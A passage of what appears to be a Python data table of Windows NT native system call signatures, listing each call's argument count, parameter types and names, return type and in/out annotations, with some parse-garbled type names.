'__IN']), 'NtCreateEnlistment': (8, ['PHANDLE', 'ACCESS_MASK', 'HANDLE', 'HANDLE', 'POBJECT_ATTRIBUTES', 'ULONG', 'NOTIFICATION_MASK', 'PVOID'], ['EnlistmentHandle', 'DesiredAccess', 'ResourceManagerHandle', 'TransactionHandle', 'ObjectAttributes', 'CreateOptions', 'NotificationMask', 'EnlistmentKey'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__IN', '__IN_opt', '__IN_opt', '__IN', '__IN_opt']), 'NtCreateResourceManager': (7, ['PHANDLE', 'ACCESS_MASK', 'HANDLE', 'LPGUID', 'POBJECT_ATTRIBUTES', 'ULONG', 'PUNICODE_STRING'], ['ResourceManagerHandle', 'DesiredAccess', 'TmHandle', 'RmGuid', 'ObjectAttributes', 'CreateOptions', 'Description'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__IN', '__IN_opt', '__IN_opt', '__IN_opt']), 'NtCreateTransaction': (10, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'LPGUID', 'HANDLE', 'ULONG', 'ULONG', 'ULONG', 'PLARGE_INTEGER', 'PUNICODE_STRING'], ['TransactionHandle', 'DesiredAccess', 'ObjectAttributes', 'Uow', 'TmHandle', 'CreateOptions', 'IsolationLevel', 'IsolationFlags', 'Time_Out', 'Description'], 'NTSTATUS', ['__OUT', '__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__IN_opt', '__IN_opt', '__IN_opt', '__IN_opt', '__IN_opt']), 'NtCreateTransactionManager': (6, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'PUNICODE_STRING', 'ULONG', 'ULONG'], ['TmHandle', 'DesiredAccess', 'ObjectAttributes', 'LogFileName', 'CreateOptions', 'CommitStrength'], 'NTSTATUS', ['__OUT', '__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__IN_opt']), 'NtEnumerateTransactionObject': (5, ['HANDLE', 'KTMOBJECT_TYPE', 'PKTMOBJECT_CURSOR', 'ULONG', 'PULONG'], ['RootObjectHandle', 'QueryType', 'ObjectCursor', 'ObjectCursorLength', 'ReturnLength'], 'NTSTATUS', ['__IN_opt', '__IN', None, '__IN', '__OUT']), 'NtFreezeTransactions': (2, ['PLARGE_INTEGER', 'PLARGE_INTEGER'], ['FreezeTime_Out', 'ThawTime_Out'], 'NTSTATUS', ['__IN', '__IN']), 'NtGetNotificationResourceManager': (7, ['HANDLE', 'PTRANSACTION_NOTIFICATION', 'ULONG', 'PLARGE_INTEGER', '__opt', 'ULONG', 'ULONG_PTR'], ['ResourceManagerHandle', 'TransactionNotification', 'NotificationLength', 'Time_Out', 'PULONG', 'Asynchronous', 'AsynchronousContext'], 'NTSTATUS', ['__IN', '__OUT', '__IN', '__IN_opt', None, '__IN', '__IN_opt']), 'NtOpenEnlistment': (5, ['PHANDLE', 'ACCESS_MASK', 'HANDLE', 'LPGUID', 'POBJECT_ATTRIBUTES'], ['EnlistmentHandle', 'DesiredAccess', 'ResourceManagerHandle', 'EnlistmentGuid', 'ObjectAttributes'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__IN', '__IN_opt']), 'NtOpenResourceManager': (5, ['PHANDLE', 'ACCESS_MASK', 'HANDLE', 'LPGUID', 'POBJECT_ATTRIBUTES'], ['ResourceManagerHandle', 'DesiredAccess', 'TmHandle', 'ResourceManagerGuid', 'ObjectAttributes'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__IN_opt', '__IN_opt']), 'NtOpenTransaction': (5, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'LPGUID', 'HANDLE'], ['TransactionHandle', 'DesiredAccess', 'ObjectAttributes', 'Uow', 'TmHandle'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__IN', '__IN_opt']), 'NtOpenTransactionManager': (6, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'PUNICODE_STRING', 'LPGUID', 'ULONG'], ['TmHandle', 'DesiredAccess', 'ObjectAttributes', 'LogFileName', 'TmIdentity', 'OpenOptions'], 'NTSTATUS', ['__OUT', '__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__IN_opt']), 'NtPrepareComplete': (2, ['HANDLE', 'PLARGE_INTEGER'], ['EnlistmentHandle', 'TmVirtualClock'], 'NTSTATUS', ['__IN', '__IN_opt']), 'NtPrepareEnlistment': (2, ['HANDLE', 'PLARGE_INTEGER'], ['EnlistmentHandle', 'TmVirtualClock'], 'NTSTATUS', ['__IN', '__IN_opt']), 'NtPrePrepareComplete': (2, ['HANDLE', 'PLARGE_INTEGER'], ['EnlistmentHandle', 'TmVirtualClock'], 'NTSTATUS', ['__IN', '__IN_opt']), 'NtPrePrepareEnlistment': (2, ['HANDLE', 'PLARGE_INTEGER'], ['EnlistmentHandle', 'TmVirtualClock'], 'NTSTATUS', ['__IN', '__IN_opt']), 'NtPropagationComplete': (4, ['HANDLE', 'ULONG', 'ULONG', 'PVOID'], ['ResourceManagerHandle', 'RequestCookie', 'BufferLength', 'Buffer'], 'NTSTATUS', ['__IN', '__IN', '__IN', None]), 'NtPropagationFailed': (3, ['HANDLE', 'ULONG', 'NTSTATUS'], ['ResourceManagerHandle', 'RequestCookie', 'PropStatus'], 'NTSTATUS', ['__IN', '__IN', '__IN']), 'NtQueryInformationEnlistment': (5, ['HANDLE', 'ENLISTMENT__INFORMATION_CLASS', 'PVOID', 'ULONG', '__opt'], ['EnlistmentHandle', 'EnlistmentInformationClass', 'EnlistmentInformation', 'EnlistmentInformationLength', 'PULONG'], 'NTSTATUS', ['__IN', '__IN', None, '__IN', None]), 'NtQueryInformationResourceManager': (5, ['HANDLE', 'RESOURCEMANAGER__INFORMATION_CLASS', 'PVOID', 'ULONG', '__opt'], ['ResourceManagerHandle', 'ResourceManagerInformationClass', 'ResourceManagerInformation', 'ResourceManagerInformationLength', 'PULONG'], 'NTSTATUS', ['__IN', '__IN', None, '__IN', None]), 'NtQueryInformationTransaction': (5, ['HANDLE', 'TRANSACTION__INFORMATION_CLASS', 'PVOID', 'ULONG', '__opt'], ['TransactionHandle', 'TransactionInformationClass', 'TransactionInformation', 'TransactionInformationLength', 'PULONG'], 'NTSTATUS', ['__IN', '__IN', None, '__IN', None]), 'NtQueryInformationTransactionManager': (5, ['HANDLE', 'TRANSACTIONMANAGER__INFORMATION_CLASS', 'PVOID', 'ULONG', '__opt'], ['TransactionManagerHandle', 'TransactionManagerInformationClass', 'TransactionManagerInformation', 'TransactionManagerInformationLength', 'PULONG'], 'NTSTATUS', ['__IN', '__IN', None, '__IN', None]), 'NtReadOnlyEnlistment': (2, ['HANDLE', 'PLARGE_INTEGER'], ['EnlistmentHandle', 'TmVirtualClock'], 'NTSTATUS', ['__IN', '__IN_opt']), 'NtRecoverEnlistment': (2, ['HANDLE', 'PVOID'], ['EnlistmentHandle', 'EnlistmentKey'], 'NTSTATUS', ['__IN', '__IN_opt']), 'NtRecoverResourceManager': (1, ['HANDLE'], ['ResourceManagerHandle'], 'NTSTATUS', ['__IN']), 'NtRecoverTransactionManager': (1, ['HANDLE'], ['TransactionManagerHandle'], 'NTSTATUS', ['__IN']), 'NtRegisterProtocolAddressInformation': (5, ['HANDLE', 'PCRM_PROTOCOL_ID', 'ULONG', 'PVOID', 'ULONG'], ['ResourceManager', 'ProtocolId', 'ProtocolInformationSize', 'ProtocolInformation', 'CreateOptions'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN', '__IN_opt']), 'NtRenameTransactionManager': (2, ['PUNICODE_STRING', 'LPGUID'], ['LogFileName', 'ExistingTransactionManagerGuid'], 'NTSTATUS', ['__IN', '__IN']), 'NtRollBackComplete': (2, ['HANDLE', 'PLARGE_INTEGER'], ['EnlistmentHandle', 'TmVirtualClock'], 'NTSTATUS', ['__IN', '__IN_opt']), 'NtRollBackEnlistment': (2, ['HANDLE', 'PLARGE_INTEGER'], ['EnlistmentHandle', 'TmVirtualClock'], 'NTSTATUS', ['__IN', '__IN_opt']), 'NtRollBackTransaction': (2, ['HANDLE', 'BOOLEAN'], ['TransactionHandle', 'Wait'], 'NTSTATUS', ['__IN', '__IN']), 'NtRollforwardTransactionManager': (2, ['HANDLE', 'PLARGE_INTEGER'], ['TmHandle', 'TmVirtualClock'], 'NTSTATUS', ['__IN', '__IN_opt']), 'NtSetInformationEnlistment': (4, ['HANDLE', 'ENLISTMENT__INFORMATION_CLASS', 'PVOID', 'ULONG'], ['EnlistmentHandle', 'EnlistmentInformationClass', 'EnlistmentInformation', 'EnlistmentInformationLength'], 'NTSTATUS', ['__IN', '__IN', None, '__IN']), 'NtSetInformationResourceManager': (4, ['HANDLE', 'RESOURCEMANAGER__INFORMATION_CLASS', 'PVOID', 'ULONG'], ['ResourceManagerHandle', 'ResourceManagerInformationClass', 'ResourceManagerInformation', 'ResourceManagerInformationLength'], 'NTSTATUS', ['__IN', '__IN', None, '__IN']), 'NtSetInformationTransaction': (4, ['HANDLE', 'TRANSACTION__INFORMATION_CLASS', 'PVOID', 'ULONG'], ['TransactionHandle', 'TransactionInformationClass', 'TransactionInformation', 'TransactionInformationLength'], 'NTSTATUS', ['__IN', '__IN', None, '__IN']), 'NtSetInformationTransactionManager': (4, ['HANDLE', 'TRANSACTIONMANAGER__INFORMATION_CLASS', 'PVOID', 'ULONG'], ['TmHandle', 'TransactionManagerInformationClass', 'TransactionManagerInformation', 'TransactionManagerInformationLength'], 'NTSTATUS', ['__IN_opt', '__IN', None, '__IN']), 'NtSinglePhaseReject': (2, ['HANDLE', 'PLARGE_INTEGER'], ['EnlistmentHandle', 'TmVirtualClock'], 'NTSTATUS', ['__IN', '__IN_opt']), 'NtStartTm': (0, [], [], 'NTSTATUS', []), 'NtThawRegistry': (0, [], [], 'NTSTATUS', []), 'NtThawTransactions': (0, [], [], 'NTSTATUS', []), 'NtDrawText': (1, ['PUNICODE_STRING'], ['Text'], 'NTSTATUS', ['__IN']), 'NtTraceControl': (6, ['ULONG', 'PVOID', 'ULONG', 'PVOID', 'ULONG', 'PULONG'], ['FunctionCode', 'InBuffer', 'InBufferLen', '__OUTBuffer', '__OUTBufferLen', 'ReturnLength'], 'NTSTATUS', ['__IN', None, '__IN', None, '__IN', '__OUT']), 'NtSetWnfProcessNotificationEvent': (1, ['HANDLE'], ['Unknown1'], 'NTSTATUS', ['__IN']), 'NtSetInformationVirtualMemory': (6, ['HANDLE', 'VIRTUAL_MEMORY__INFORMATION_CLASS', 'ULONG_PTR', 'PMEMORY_RANGE_ENTRY', 'PVOID', 'ULONG'], ['ProcessHandle', 'VmInformationClass', 'NumberOfEntries', 'VirtualAddresses', 'VmInformation', 'VmInformationLength'], 'NTSTATUS', ['__IN_', '__IN_', '__IN_', None, None, '__IN_']), 'NtOpenPrivateNamespace': (4, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'PVOID'], ['NamespaceHandle', 'DesiredAccess', 'ObjectAttributes', 'BoundaryDescriptor'], 'NTSTATUS', ['__OUT', '__IN', '__IN_opt', '__IN']), 'NtCreatePrivateNamespace': (4, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'PVOID'], ['NamespaceHandle', 'DesiredAccess', 'ObjectAttributes', 'BoundaryDescriptor'], 'NTSTATUS', ['__OUT', '__IN', '__IN_opt', '__IN']), 'NtDeletePrivateNamespace': (1, ['HANDLE'], ['NamespaceHandle'], 'NTSTATUS', ['__IN']), 'NtReplacePartitionUnit': (3, ['PUNICODE_STRING', 'PUNICODE_STRING', 'ULONG'], ['TargetInstancePath', 'SpareInstancePath', 'Flags'], 'NTSTATUS', ['__IN', '__IN', '__IN']), 'NtSerializeBoot': (0, [], [], 'NTSTATUS', []), 'NtOpenKeyTransacted': (4, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'HANDLE'], ['KeyHandle', 'DesiredAccess', 'ObjectAttributes', 'TransactionHandle'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__IN']), 'NtOpenKeyTransactedEx': (5, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'ULONG', 'HANDLE'], ['KeyHandle', 'DesiredAccess', 'ObjectAttributes', 'OpenOptions', 'TransactionHandle'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__IN', '__IN']), 'NtFreezeRegistry': (1, ['ULONG'], ['Time_OutInSeconds'], 'NTSTATUS', ['__IN']), 'NtCreateKeyTransacted': (8, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', '__reserved', 'PUNICODE_STRING', 'ULONG', 'HANDLE', '__opt'], ['KeyHandle', 'DesiredAccess', 'ObjectAttributes', 'ULONG', 'Class', 'CreateOptions', 'TransactionHandle', 'PULONG'], 'NTSTATUS', ['__OUT', '__IN', '__IN', None, '__IN_opt', '__IN', '__IN', None]), 'NtQuerySecurityAttributesToken': (6, ['HANDLE', 'PUNICODE_STRING', 'ULONG', 'PVOID', 'ULONG', 'PULONG'], ['TokenHandle', 'Attributes', 'NumberOfAttributes', 'Buffer', 'Length', 'ReturnLength'], 'NTSTATUS', ['__IN', None, '__IN', None, '__IN', '__OUT']), 'NtWow64CallFunction64': (7, ['ULONG', 'ULONG', 'ULONG', 'PVOID', 'ULONG', 'PVOID', '__opt'], ['FunctionIndex', 'Flags', 'InputLength', 'InputBuffer', '__OUTputLength', '__OUTputBuffer', 'PULONG'], 'NTSTATUS', ['__IN', '__IN', '__IN', None, '__IN', None, None]), 'NtWow64WriteVirtualMemory64': (5, ['HANDLE', 'PVOID64', 'PVOID', 'ULONGLONG', '__opt'], ['ProcessHandle', 'BaseAddress', 'Buffer', 'BufferSize', 'PULONGLONG'], 'NTSTATUS', ['__IN', '__IN_opt', None, '__IN', None]), 'NtAlpcConnectPortEx': (11, ['PHANDLE', 'POBJECT_ATTRIBUTES', 'POBJECT_ATTRIBUTES', 'PALPC_PORT_ATTRIBUTES', 'ULONG', 'PSECURITY_DESCRIPTOR', 'PPORT_MESSAGE', 'PSIZE_T', 'PALPC_MESSAGE_ATTRIBUTES', 'PALPC_MESSAGE_ATTRIBUTES', 'PLARGE_INTEGER'], ['PortHandle', 'ConnectionPortObjectAttributes', 'ClientPortObjectAttributes', 'PortAttributes', 'Flags', 'ServerSecurityRequirements', 'ConnectionMessage', 'BufferLength', '__OUTMessageAttributes', 'InMessageAttributes', 'Time_Out'], 'NTSTATUS', [None, '__IN_', '__IN_opt_', '__IN_opt_', '__IN_', '__IN_opt_', None, '__IN_OUT_opt_', '__IN_OUT_opt_', '__IN_OUT_opt_', '__IN_opt_']), 'NtAlpcImpersonateClientContainerOfPort': (3, ['HANDLE', 'PPORT_MESSAGE', 'ULONG'], ['PortHandle', 'Message', 'Flags'], 'NTSTATUS', ['__IN_', '__IN_', '__IN_']), 'NtAreMappedFilesTheSame': (2, ['PVOID', 'PVOID'], ['File1MappedAsAnImage', 'File2MappedAsFile'], 'NTSTATUS', ['__IN', '__IN']), 'NtAssignProcessToJobObject': (2, ['HANDLE', 'HANDLE'], ['JobHandle', 'ProcessHandle'], 'NTSTATUS', [None, None]), 'NtCreateJobSet': (3, ['IN', 'IN', 'IN'], ['ULONG', 'PJOB_SET_ARRAY', 'ULONG'], 'NTSTATUS', [None, None, None]), 'NtCreateJobObject': (3, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES'], ['JobHandle', 'DesiredAccess', 'ObjectAttributes'], 'NTSTATUS', [None, None, None]), 'NtOpenJobObject': (3, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES'], ['JobHandle', 'DesiredAccess', 'ObjectAttributes'], 'NTSTATUS', [None, None, None]), 'NtQueryInformationJobObject': (5, ['HANDLE', 'JOBOBJECTINFOCLASS', 'PVOID', 'ULONG', 'PULONG'], ['JobHandle', 'JobInformationClass', 'JobInformation', 'JobInformationLength', 'ReturnLength'], 'NTSTATUS', [None, None, None, None, None]), 'NtSetInformationJobObject': (4, ['HANDLE', 'JOBOBJECTINFOCLASS', 'PVOID', 'ULONG'], ['JobHandle', 'JobInformationClass', 'JobInformation', 'JobInformationLength'], 'NTSTATUS', [None, None, None, None]), 'NtTerminateJobObject': (2, ['HANDLE', 'NtSYSAPI'], ['JobHandle', 'NTSTATUS'], 'NTSTATUS', [None, None]), 'NtCallEnclave': (4, ['PENCLAVE_R__OUTINE', 'PVOID', 'BOOLEAN', 'opt_'], ['R__OUTine', 'Parameter', 'WaitForThread', 'PVOID'], 'NTSTATUS', ['__IN_', '__IN_', '__IN_', None]), 'NtTerminateEnclave': (2, ['PVOID', 'BOOLEAN'], ['BaseAddress', 'WaitForThread'], 'NTSTATUS', ['__IN_', '__IN_']), 'NtInitializeEnclave': (5, ['HANDLE', 'PVOID', 'PVOID', 'ULONG', 'opt_'], ['ProcessHandle', 'BaseAddress', 'EnclaveInformation', 'EnclaveInformationLength', 'PULONG'], 'NTSTATUS', ['__IN_', '__IN_', None, '__IN_', None]), 'NtCreateEnclave': (9, ['HANDLE', 'PVOID*', 'ULONG_PTR', 'SIZE_T', 'SIZE_T', 'ULONG', 'PVOID', 'ULONG', 'opt_'], ['ProcessHandle', 'BaseAddress', 'ZeroBits', 'Size', 'InitialCommitment', 'EnclaveType', 'EnclaveInformation', 'EnclaveInformationLength', 'PULONG'], 'NTSTATUS', ['__IN_', '__IN_OUT_', '__IN_', '__IN_', '__IN_', '__IN_', None, '__IN_', None]), 'NtLoadEnclaveData': (9, ['HANDLE', 'PVOID', 'PVOID', 'SIZE_T', 'ULONG', 'PVOID', 'ULONG', 'opt_', 'opt_'], ['ProcessHandle', 'BaseAddress', 'Buffer', 'BufferSize', 'Protect', 'PageInformation', 'PageInformationLength', 'PSIZE_T', 'PULONG'], 'NTSTATUS', ['__IN_', '__IN_', None, '__IN_', '__IN_', None, '__IN_', None, None]), 'NtCreateSectionEx': (9, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'PLARGE_INTEGER', 'ULONG', 'ULONG', 'HANDLE', 'PMEM_EXTENDED_PARAMETER', 'ULONG'], ['SectionHandle', 'DesiredAccess', 'ObjectAttributes', 'MaximumSize', 'SectionPageProtection', 'AllocationAttributes', 'FileHandle', 'ExtendedParameters', 'ExtendedParameterCount'], 'NTSTATUS', [None, '__IN_', '__IN_opt_', '__IN_opt_', '__IN_', '__IN_', '__IN_opt_', None, '__IN_']), 'NtMapViewOfSectionEx': (9, ['HANDLE', 'HANDLE', 'PVOID', 'PLARGE_INTEGER', 'PSIZE_T', 'ULONG', 'ULONG', 'PMEM_EXTENDED_PARAMETER', 'ULONG'], ['SectionHandle', 'ProcessHandle', '*BaseAddress', 'SectionOffset', 'ViewSize', 'AllocationType', 'Win32Protect', 'ExtendedParameters', 'ExtendedParameterCount'], 'NTSTATUS', ['__IN_', '__IN_', None, '__IN_OUT_opt_', '__IN_OUT_', '__IN_', '__IN_', None, '__IN_']), 'NtUnmapViewOfSectionEx': (3, ['HANDLE', 'PVOID', 'ULONG'], ['ProcessHandle', 'BaseAddress', 'Flags'], 'NTSTATUS', ['__IN_', '__IN_opt_', '__IN_']), 'NtCreatePartition': (5, ['HANDLE', 'PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'ULONG'], ['ParentPartitionHandle', 'PartitionHandle', 'DesiredAccess', 'ObjectAttributes', 'PreferredNode'], 'NTSTATUS', ['__IN_', None, '__IN_', '__IN_opt_', '__IN_']), 'NtOpenPartition': (3, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES'], ['PartitionHandle', 'DesiredAccess', 'ObjectAttributes'], 'NTSTATUS', [None, '__IN_', '__IN_']), 'NtManagePartition': (5, ['HANDLE', 'HANDLE', 'PARTITION__INFORMATION_CLASS', 'PVOID', 'ULONG'], ['TargetHandle', 'SourceHandle', 'PartitionInformationClass', 'PartitionInformation', 'PartitionInformationLength'], 'NTSTATUS', ['__IN_', '__IN_opt_', '__IN_', None, '__IN_']), 'NtMapUserPhysicalPages': (3, ['PVOID', 'ULONG_PTR', 'PULONG_PTR'], ['VirtualAddress', 'NumberOfPages', 'UserPfnArray'], 'NTSTATUS', ['__IN_', '__IN_', None]), 'NtAllocateUserPhysicalPagesEx': (5, ['HANDLE', 'PULONG_PTR', 'PULONG_PTR', 'PMEM_EXTENDED_PARAMETER', 'ULONG'], ['ProcessHandle', 'NumberOfPages', 'UserPfnArray', 'ExtendedParameters', 'ExtendedParameterCount'], 'NTSTATUS', ['__IN_', '__IN_OUT_', None, None, '__IN_']), 'NtGetWriteWatch': (7, ['HANDLE', 'ULONG', 'PVOID', 'SIZE_T', 'PVOID', 'PULONG_PTR', 'PULONG'], ['ProcessHandle', 'Flags', 'BaseAddress', 'RegionSize', '*UserAddressArray', 'EntriesInUserAddressArray', 'Granularity'], 'NTSTATUS', ['__IN_', '__IN_', '__IN_', '__IN_', None, '__IN_OUT_', None]), 'NtResetWriteWatch': (3, ['HANDLE', 'PVOID', 'SIZE_T'], ['ProcessHandle', 'BaseAddress', 'RegionSize'], 'NTSTATUS', ['__IN_', '__IN_', '__IN_']), 'NtCreatePagingFile': (4, ['PUNICODE_STRING', 'PLARGE_INTEGER', 'PLARGE_INTEGER', 'ULONG'], ['PageFileName', 'MinimumSize', 'MaximumSize', 'Priority'], 'NTSTATUS', ['__IN_', '__IN_', '__IN_', '__IN_']), 'NtCancelIoFileEx': (3, ['HANDLE', 'PIO_STATUS_BLOCK', 'PIO_STATUS_BLOCK'], ['FileHandle', 'IoRequestToCancel', 'IoStatusBlock'], 'NTSTATUS', ['__IN_', '__IN_opt_', None]), 'NtCancelWaitCompletionPacket': (2, ['HANDLE', 'BOOLEAN'], ['WaitCompletionPacketHandle', 'RemoveSignaledPacket'], 'NTSTATUS', ['__IN_', '__IN_']), 'NtCreateWaitCompletionPacket': (3, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES'], ['WaitCompletionPacketHandle', 'DesiredAccess', 'ObjectAttributes'], 'NTSTATUS', [None, '__IN_', '__IN_opt_']), 'NtCompareObjects': (2, ['HANDLE', 'HANDLE'], ['Handle', 'Handle2'], 'NTSTATUS', ['__IN_', '__IN_']), 'NtCompareTokens': (3, ['HANDLE', 'HANDLE', 'PBOOLEAN'], ['FirstTokenHandle', 'SecondTokenHandle', 'Equal'], 'NTSTATUS', ['__IN_', '__IN_', None]), 'NtContinueEx': (2, ['PCONTEXT', 'PKCONTINUE_ARGUMENT'], ['ContextRecord', 'ContinueArgument'], 'NTSTATUS', ['__IN_', '__IN_']), 'NtCreateCrossVmEvent': (6, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'ULONG', 'PVOID', 'PGUID'], ['EventHandle', 'DesiredAccess', 'ObjectAttributes', 'Unknown', 'Unknown', 'Guid'], 'NTSTATUS', ['__OUT', '__IN', '__IN', None, None, '__IN']), 'NtCreateCrossVmMutant': (6, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'ULONG', 'PVOID', 'PGUID'], ['EventHandle', 'DesiredAccess', 'ObjectAttributes', 'Unknown', 'Unknown', 'Guid'], 'NTSTATUS', ['__OUT', '__IN', '__IN', None, None, '__IN']), 'NtCreateDirectoryObjectEx': (5, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'HANDLE', 'ULONG'], ['DirectoryHandle', 'DesiredAccess', 'ObjectAttributes', 'ShadowDirectoryHandle', 'Flags'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__IN', '__IN']), 'NtCreateIRTimer': (2, ['PHANDLE', 'ACCESS_MASK'], ['TimerHandle', 'DesiredAccess'], 'NTSTATUS', ['__OUT', '__IN']), 'NtCreateLowBoxToken': (9, ['PHANDLE', 'HANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'PSID', 'DWORD', 'PSID_AND_ATTRIBUTES', 'DWORD', 'PVOID'], ['LowBoxToken', 'hOrgToken', 'DesiredAccess', 'ObjectAttributes', 'AppContainerSid', 'CapabilityCount', 'Capabilities', 'LowBoxCount', 'LowBoxStruct'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN']), 'NtCreateRegistryTransaction': (4, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'ULONG'], ['RegistryHandle', 'DesiredAccess', 'ObjectAttributes', 'Flags'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__IN']), 'NtCreateThreadEx': (11, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'HANDLE', 'PVOID', 'PVOID', 'ULONG', 'ULONG', 'ULONG', 'ULONG', 'PVOID'], ['ThreadHandle', 'DesiredAccess', 'ObjectAttributes', 'ProcessHandle', 'StartR__OUTine', 'Argument', 'CreateFlags', 'ZeroBits', 'StackSize', 'MaximumStackSize', 'AttributeList'], 'NTSTATUS', ['__OUT', '__IN', '__IN_opt', '__IN', '__IN', '__IN_opt', '__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__IN_opt']), 'NtCreateTimer2': (5, ['PHANDLE', 'PVOID', 'POBJECT_ATTRIBUTES', 'ULONG', 'ACCESS_MASK'], ['TimerHandle', 'Unknown1', 'ObjectAttributes', 'Attributes', 'DesiredAccess'], 'NTSTATUS', ['__OUT', '__IN_opt', '__IN_opt', '__IN', '__IN']), 'NtCreateTokenEx': (17, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'TOKEN_TYPE', 'PLUID', 'PLARGE_INTEGER', 'PTOKEN_USER', 'PTOKEN_GROUPS', 'PTOKEN_PRIVILEGES', 'PTOKEN_SECURITY_ATTRIBUTES__INFORMATION', 'PTOKEN_SECURITY_ATTRIBUTES__INFORMATION', 'PTOKEN_GROUPS', 'PTOKEN_MANDATORY_POLICY', 'PTOKEN_OWNER', 'PTOKEN_PRIMARY_GROUP', 'PTOKEN_DEFAULT_DACL', 'PTOKEN_SOURCE'], ['TokenHandle', 'DesiredAccess', 'ObjectAttributes', 'TokenType', 'AuthenticationId', 'ExpirationTime', 'User', 'Groups', 'Privileges', 'UserAttributes', 'DeviceAttributes', 'DeviceGroups', 'TokenMandatoryPolicy', 'Owner', 'PrimaryGroup', 'DefaultDacl', 'TokenSource'], 'NTSTATUS', ['__OUT', '__IN', '__IN_opt', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__IN_opt', '__IN_opt', '__IN', '__IN_opt', '__IN']), 'NtCreateUserProcess': (11, ['PHANDLE', 'PHANDLE', 'ACCESS_MASK', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'POBJECT_ATTRIBUTES', 'ULONG', 'ULONG', 'PRTL_USER_PROCESS_PARAMETERS', 'PVOID', 'PVOID'], ['ProcessHandle', 'ThreadHandle', 'ProcessDesiredAccess', 'ThreadDesiredAccess', 'ProcessObjectAttributes', 'ThreadObjectAttributes', 'ProcessFlags', 'ThreadFlags', 'ProcessParameters', 'CreateInfo', 'AttributeList'], 'NTSTATUS', ['__OUT', '__OUT', '__IN', '__IN', '__IN_opt', '__IN_opt', '__IN', '__IN', '__IN_opt', '__IN_OUT', '__IN_opt']), 'NtCreateWaitablePort': (5, ['PHANDLE', 'POBJECT_ATTRIBUTES', 'ULONG', 'ULONG', 'ULONG'], ['PortHandle', 'ObjectAttributes', 'MaxConnectionInfoLength', 'MaxMsgLength', 'MaxPoolUsage'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__IN', '__IN']), 'NtCreateWnfStateName': (7, ['PCWNF_STATE_NAME', 'ULONG', 'ULONG', 'BOOLEAN', 'PVOID', 'ULONG', 'PSECURITY_DESCRIPTOR'], ['StateName', 'Lifetime', 'DataScope', 'PersistData', 'TypeId', 'MaximumStateSize', 'SecurityDescriptor'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__IN', '__IN_opt', '__IN', '__IN']), 'NtDebugContinue': (3, ['HANDLE', 'PCLIENT_ID', 'NTSTATUS'], ['DebugHandle', 'ClientId', 'Status'], 'NTSTATUS', ['__IN', '__IN', '__IN']), 'NtDeleteBootEntry': (1, ['PUNICODE_STRING'], ['Name'], 'NTSTATUS', ['__IN']), 'NtDeleteDriverEntry': (1, ['PUNICODE_STRING'], ['Name'], 'NTSTATUS', ['__IN']), 'NtDeleteWnfStateData': (2, ['PCWNF_STATE_NAME', 'PVOID'], ['StateName', 'ExplicitScope'], 'NTSTATUS', ['__IN', '__IN_opt']), 'NtDeleteWnfStateName': (1, ['PCWNF_STATE_NAME'], ['StateName'], 'NTSTATUS', ['__IN']), 'NtDirectGraphicsCall': (5, ['ULONG', 'ULONG', 'ULONG', 'ULONG', 'ULONG'], ['Unknown', 'Unknown', 'Unknown', 'Unknown', 'Unknown'], 'NTSTATUS', [None, None, None, None, None]), 'NtFilterBootOption': (5, ['ULONG', 'ULONG', 'ULONG', 'PVOID', 'ULONG'], ['FilterOperation', 'ObjectType', 'ElementType', 'Data', 'DataSize'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN', '__IN']), 'NtFilterToken': (6, ['HANDLE', 'ULONG', 'PTOKEN_GROUPS', 'PTOKEN_PRIVILEGES', 'PTOKEN_GROUPS', 'PHANDLE'], ['ExistingTokenHandle', 'Flags', 'SidsToDisable', 'PrivilegesToDelete', 'RestrictedSids', 'NewTokenHandle'], 'NTSTATUS', ['__IN', '__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__OUT']), 'NtFilterTokenEx': (14, ['HANDLE', 'ULONG', 'PTOKEN_GROUPS', 